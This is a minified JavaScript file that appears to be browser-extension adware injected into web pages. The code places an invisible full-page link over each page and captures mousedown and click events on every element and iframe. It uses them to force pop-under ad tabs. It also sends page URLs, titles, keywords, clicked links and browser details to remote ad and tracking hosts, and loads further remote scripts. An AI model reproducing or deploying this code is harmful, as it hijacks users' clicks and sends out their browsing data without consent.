_GPL.j(function(g,b,ta,x,m,f,y,Na,Oa,Db,da,z,nb,ua,w,Pa,n,Qa,ha,Ra,s,p,Eb,q,ob,va){function O(){Sa(k,ha,O);pb(function(a,b){d=a;P||(P=!0,d!=wa&&K&&(d+="&fo=1"),Ta(),qb(),rb(),Ua(),xa=+new m,B(k,ha,Va),Wa=ua(function(){36E5<+new m-xa&&X(!1)},5E3))})}function Va(a){xa=+new m;P&&(t&&t.remove(),x(ya),za=a.target||a.srcElement,ya=w(Ta,50))}function X(a){P&&(g("iframe").off("mouseover",Xa),x(ya),t&&t.remove(),Q&&Q.remove(),P=!1,ta(Wa),sb(),Sa(k,ha,Va),d=void 0,E=A="",Aa=!1,a||B(k,ha,O),w(O,1E3*Math.max(L,
F)))}function B(a,b,c){if(n[Qa]){var e=ia();try{return e.call(a,b,c,!0)}catch(f){a[Qa](b,c,!0)}}else a.attachEvent("on"+b,c,!0)}function rb(){ea=!0;b.ah&&b.ah(G,R);g("*").add(n).each(function(a,b){B(b,G,R)});Ya||(Ya=!0,g("*").add(n).each(function(a,b){B(b,"mousedown",S);B(b,"mouseup",S);B(b,"click",S)}),b.ah&&(b.ah("mousedown",S),b.ah("mouseup",S),b.ah("click",S)));g("iframe").each(function(a,b){try{B(b.contentWindow,G,R)}catch(h){}});Za=ua(function(){g("iframe").each(function(a,b){b[$a]||(b[$a]=
1,g(b).mouseover(Xa))})},100);if(fa)try{b.log("Attempting to pop from extension to: "+d);var a="ld893_";A&&(a+="_"+f(A),E&&(a+=","+E),a+="_");var a=a+("_"+H()),h=b.proto+b.baseCDN+"/pwn.html?u="+f(d)+"&n="+a+"&r=";"h"!=fa||Y?"w"!=fa||Y||(Y=!0,Ba(n,"openThatTabBitch",{url:h,isUnder:!1,attr:"z7b85_91c4"}),w(function(){Y=!1},100)):(Y=!0,Ba(k,"createNewTab",{url:h,focused:"true"}),Ba(k.documentElement,"createNewTab",{url:h,focused:"true"}),w(function(){Y=!1},100));var c=ua(function(){k.documentElement.getAttribute("z7b85_91c4")&&
(ta(c),X(!0),ab(),k.documentElement.removeAttribute("z7b85_91c4"))},50)}catch(e){}}function Ba(a,b,c){if(k.createEvent){var e=k.createEvent("CustomEvent");e.initCustomEvent(b,!1,!1,c);a.dispatchEvent(e)}else e=k.createEventObject(),e.detail=c,e.realType=b,a.fireEvent("ondataavailable",e)}function T(a){a=da.userAgent.match(nb(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function tb(){if(T("Chrome")){for(var a=0;a<da.plugins.length;a++)if("Widevine Content Decryption Module"==da.plugins[a].name)return!1;
return!0}return!1}function Ta(){if(P){t&&t.remove();if(za)for(var a=za;a;){if(a["91c4"])return;a=a.parentNode}t=g('<a style="z-index:999999999999999;padding:0;margin:0;cursor:default;opacity:0;position:fixed;top:0;left:0;background:transparent;width:100%;height:100%;">&nbsp;</a>');a="ld893_";A&&(a+="_"+A,E&&(a+=","+E),a+="_");a+="_"+H();t.attr("target",a);t.attr("href",d);B(t[0],"mousedown",bb);B(t[0],"mouseup",bb);B(t[0],"click",R);t.appendTo(k.body)}}function qb(){Q||(Q=g('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo("body"),
Q.mouseout(function(){Q.hide()}))}function Xa(a){var b=g(a.target),c=b.offset();c.width=b.outerWidth();c.height=b.outerHeight();c.display="block";Q.css(c);a.stopPropagation()}function ub(a){if(d!=wa){a=a.target||a.srcElement;for(var h="";a;){Z||(Z=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){h=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}if(!d)return!1;h&&-1==h.indexOf(aa)&&(d+="&t="+f(h.substring(0,Math.max(0,1500-d.length))));d+="&rt="+
(+new m-cb);Z&&(d+="&data_tag="+f(Z));"/"!=y.pathname&&(d+="&mk="+f(b.B64.encode(Ca().substring(0,Math.max(0,1500-d.length)))));d+=db?"&data_sid="+f(db):""}b.log("Popping to: "+d);a="ld893_";A&&(a+="_"+f(A),E&&(a+=","+E),a+="_");a+="_"+H();h=a;ba.parentNode||(Da=eb());if(da.userAgent.match(/\bEdge\/\d+/i))a=Da(d,h);else if(a=Da("",1749==r?h:"_blank"))a.name=h,0.02>Math.random()?(h=""+d,-1<d.indexOf(aa)&&(h="http://"+aa+"/pclk?c="+f(A)+"&crl="+f(d)),a.location.href=h):a.location.href=d;return a}function Ca(){function a(a){return a.toLowerCase().replace(/[.,!?]/g,
" ").split(" ")}var b=[];g("title").length&&(b=b.concat(a(g("title").text())));g('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var c=g.trim(g(this).attr("content"));c&&c.match(/^\s*[a-zA-Z0-9]/)&&(b=b.concat(a(c)))});return g.trim(function(a){var b=[];g.each(a,function(a,c){-1==g.inArray(c,b)&&b.push(c)});return b}(b).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function fb(a,h){a=(a||y.href).substr(0,1500);var c=
"/"!=y.pathname?Ca():"";a=a.replace(/:/g,"%3A");var c=c.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),e=b.getSubId?"&subid="+b.getSubId(ja):"",c=f(b.B64.encode(a+"::z-"+r+"-"+gb+"::"+c)),d="&cb="+(h||Ea),d=d+("&data_fr="+(hb(C)?"false":"true")),d=d+("&data_proto="+f(y.protocol));K&&(d+="&fo=1&data_fo=1");return b.proto+aa+(I?"/dpops":"/pops")+"?c="+c+"&a=1&ch="+f(ga)+e+d}function Sa(a,b,c){if(n[Ra])a[Ra](b,c,!1);else a.detachEvent("on"+b,c)}function sb(){ea=!1;b.rh&&b.rh(G,R);g("*").add(n).off(G,
R);g("iframe").each(function(a,b){try{g(b.contentWindow).off(G,R)}catch(c){}});ta(Za)}function vb(a){a=a||n.event||{};if(fa&&k.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;a=a.parentNode}return!1}function J(a,h){a=z(a,10);isNaN(a)&&(a=z(ka&&ka.getItem(h)||b.gc(h,10),10)||0);return a}function hb(a){return(new m(1E3*(a||0))).toDateString()==(new m).toDateString()}function la(){C|=0;u|=0;M|=0;var a=H(),b=u&&!hb(C);b&&(u=0,v.set(q,u));var c=
!U||a-C>=L&&u<U,a=a-M>=F;return!l&&b||c&&a}function R(a){a=a||n.event;if(!vb(a)){var h=ea&&(I||wb()),c=h&&ub(a);if(c&&!c.closed)return X(!0),ab(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_success&d="+f(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random(),ma&&x(ma),na&&x(na),oa=!0,S(a);c&&c.closed?na||(na=w(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+f(d)+"&location="+f(y.hostname)+"&pid="+r+"&tag="+f(Z||"")+"&r="+999999999*
Math.random()},1E3)):h&&(ma||(ma=w(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+f(d)+"&location="+f(y.hostname)+"&pid="+r+"&tag="+f(Z||"")+"&r="+999999999*Math.random()},1E3)))}}function wb(){if(v.swf){C=J(v.get(s),s);316808>Fa.score&&(u=J(v.get(q),q));var a=Ga(v.get(p));M=J(a[V],p)}return la()}function Ua(){!v.swf&&P&&v.get([s,q,p],function(a){a=a.v;C=J(a[s],s);316808>Fa.score&&(u=J(a[q],q));a=Ga(a[p]);M=J(a[V],p);w(Ua,1E3)})}function H(){return Na(new m/1E3)}function ib(a,
b,c){v.set(a,c);c=H();ka&&ka.setItem(a,c);b=z(b,10);var e=new m;e.setSeconds(e.getSeconds()+b);k.cookie=a+"="+c+";expires="+e.toUTCString()+";path=/;domain="+V}function ab(){var a=H();ib(s,L,a);v.set(ob,a);C=a;v.set(q,++u);F&&ib(p,F,pa+(pa&&",")+V+":"+a)}function Ga(a){var b={},c=H(),e=[];a=(a||"").split(",");if(a.length){for(var d=0;d<a.length;++d){var f=a[d].split(":"),g=z(f[1],10);c-g<F&&(b[f[0]]=g,e.push(f[0]+":"+g))}pa=e.join(",");v.set(p,pa)}return b}function Ha(){return I||la()||l?1:H()-(z(M,
10)||0)<F?Infinity:u>=U?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?59858:49928}function xb(a){"US"==b.vars.cid?Ia(a,47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?Ia(a,59858,88620):Ia(a,49928,59858);return la()}function Ia(a,b,c){a>=b&&(L=0,a>=c&&u>=U&&(u=Oa(0,U-1)))}function pb(a){!function c(){v.get(["frt","_GPL_oo_z7b85",s,p,q,va],function(e){if(e.v.frt){if("1750"==
r){var d=z(e.v._GPL_oo_z7b85,10)||0;if(86400>Na(new m/1E3)-d)return}yb.getAttribute("data-openThatTabBitch")&&"t3"==b.vars.wptg&&(d=["wp_t3_c","wp_t3_t"],N=e.v[va],N&&-1!=d.indexOf(N)||(N=d[Math.floor(Math.random()*d.length)],v.set(va,N)),"wp_t3_t"==N&&(fa="w"));jb||(jb=!0,b.pc(function(){kb?kb=!1:ea||(Ja=!1,X(),O())}));n[Ea]=function(b){zb(b,a)};d=H();C=J(e.v[s],s);u=J(e.v[q],q);e=Ga(e.v[p]);M=J(e[V],p);I||la()?(e=Ha(),Ka=+new m,b.insertJS(fb()+"&ms="+e+"&r="+d),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+
e+"&d="+f(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random(),x(qa),qa=w(function(){x(qa);if(!K&&!l&&1735!=r){var a=Ha(),b="http://clkmon.com/adServe/banners?pid=14442&cid="+gb+"&action=r&q=",c="/"!=y.pathname?Ca():"",b=b+f(c.substring(0,Math.max(0,1500-b.length)));n[Ea]({url:b,score:a});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&reason="+f("time")+"&pid="+r+"&u="+f(y.hostname)+"&r="+999999999*Math.random()}},15E3)):(e=Ha(),b.log("minScoreNeeded: "+
e),Infinity>e&&!Ja&&!l?(Ka=+new m,b.insertJS(fb()+"&ms="+e+"&r="+d),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+e+"&d="+f(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random(),Ja=!0):La(),I||K||(x(Ma),Ma=w(c,1E3*(5+Oa(d,C+L,M+F)-d))))}})}()}function ia(){if(!ia.v){var a=k.createElement("iframe");try{k.body.appendChild(a),ia.v=a.contentWindow.Element.prototype.addEventListener,k.body.removeChild(a)}catch(b){a&&k.body.removeChild(a)}}return ia.v||Element.prototype.addEventListener}
function eb(){ba=k.createElement("iframe");ba.style.display="none";ba.style.visibility="hidden";k.body.appendChild(ba);return ba.contentWindow.open}function S(a){a=a||n.event||{};if(oa||a.type&&a.type!=G&&ea)return a.cancelBubble=!0,a.stopPropagation&&a.stopPropagation(),a.stopImmediatePropagation&&a.stopImmediatePropagation(),a.preventDefault&&a.preventDefault(),oa&&w(function(){oa=!1},100),!1}function bb(a){a.cancelBubble=!0;a.stopPropagation&&a.stopPropagation();a.stopImmediatePropagation&&a.stopImmediatePropagation();
a.preventDefault&&a.preventDefault();return!1}function La(){Aa||K||(Aa=!0,b.insertJS(b.proto+b.baseCDN+"/items/z7b85/js/z7b85.js","z7b85bm"))}function ra(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_nobid&d="+f(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random()}function zb(a,d){x(qa);var c=+new m-Ka;E=A="";ca&&ca.score&&(!a||z(a.score,10)<z(ca.score,10))&&(a=ca,ca=Pa);if(a){if(I){if(!a.url&&!a.retry){if(l){ra();return}a.retry=L}if(a.retry){x(sa);sa=w(function(){X(!0);
O()},1E3*z(a.retry+1,10));ra();return}}a.crid&&(E=a.crid);if(I&&a.url&&!a.cid){var e=a.url.match(/[?&]c=([^&]+)/);e&&e[1]&&(a.cid=e[1])}a.cid&&(A=a.cid,a.url&&I||(a.url="http://"+aa+"/click?c="+f(A)));a.url&&(a.url+=b.getSubId?"&subid="+b.getSubId(ja):"",a.url+=N?"&data_test="+f(N):"",a.url+="&data_fb="+(tb()?"yes":"no"),a.url+="&data_rtt="+c,a.url+="&data_proto="+f(y.protocol),a.url+="&data_ic="+(lb?"true":"false"),K&&(a.url+="&data_fo=1"),a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||
0));l&&!a.url&&(a.url=wa,a.cid="xr");c=z(a.score,10);e=!a.mp;if(!e&&25<=100*parseFloat(a.mp)&&(e=!0,!K)){b.item_vars.z7b85_b=a;La();return}e=e&&(I||0<c&&xb(c));l||e?(cb=+new m,x(Ma),a.url&&a.expires&&(x(sa),sa=w(function(){X(!0);O()},1E3*z(a.expires,10))),Fa={score:c,now:new m/1},d(a.url,c),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_bid&d="+f(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random()):(ra(),La())}else ra()}var v=b.items.e6a00,k=n.document,yb=k.body,
ka=n.localStorage,Ab=T("chrome"),Bb=T("firefox");T("opera");var Cb=T("safari");T("webkit");var ga=b.item_vars["22555_ch"]||b.item_vars.ch||"",L,C,M,W=b.dt(),W=W&&W.inherited&&W.inherited.t||[],l="x"==ga||-1<W.indexOf("adult")||0==W.length&&0<g('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;l&&(-1==W.indexOf("adult_block")?ga="x":(ga="x-issue",l=!1));var F,ja="z7b85",aa=b.gsd&&b.gsd(ja)||"s.hklmm.com",P=!1,Wa,xa,ea=!1,V=b.gd(),d,cb=0,Ka=0,sa,pa="",u=0,U,Fa={},A="",E="",Ma,Ja=!1,N,ma,na,qa,Z;
da.userAgent.match(/Trident.*rv[ :]*11\./);var G="click";if(Ab||Cb)G="mousedown";else if(Bb||k.all||T("trident"))G="mouseup";var mb=b.zoneid(ja,!0).split("_"),gb=mb[0],r=mb[1]||b.vars.pid,db=b.vars.systemid,wa="http://secure.xsrving.com/display?size=800x600&ch="+f(ga)+"&referer="+f(V),fa=!1,Y=!1,Ea=b.rs(20),Q,$a=b.rs(12),t,ya,Za,lb=function(){try{return n[(n.btoa||function(a){return a})(y.hostname+"::"+(new m).toDateString())]===y.protocol}catch(a){return!1}}(),jb=!1,kb=!0,ba,Da=eb(),oa=!1,Ya=!1,
I=!1,K=0<g("#z7b85bm").length,Aa=!1,ca,za;K&&(b.ri("z7b85bm"),s+="_bm",p+="_bm",q+="_bm",aa="feed.k1wmm.com",(ca=b.item_vars.z7b85_b)&&(b.item_vars.z7b85_b=Pa));1797==r&&"GB"==b.vars.cid||"facebook.com"==V||(lb?(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=idlecrawler&d="+f(b.gd())+"&xr="+(l?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random():(l?(U=L=0,F=180,s+="_xr",p+="_xr",q+="_xr"):(L=360,U=4,F=360),O()))},_GPL,clearInterval,clearTimeout,Date,encodeURIComponent,location,Math.floor,
Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
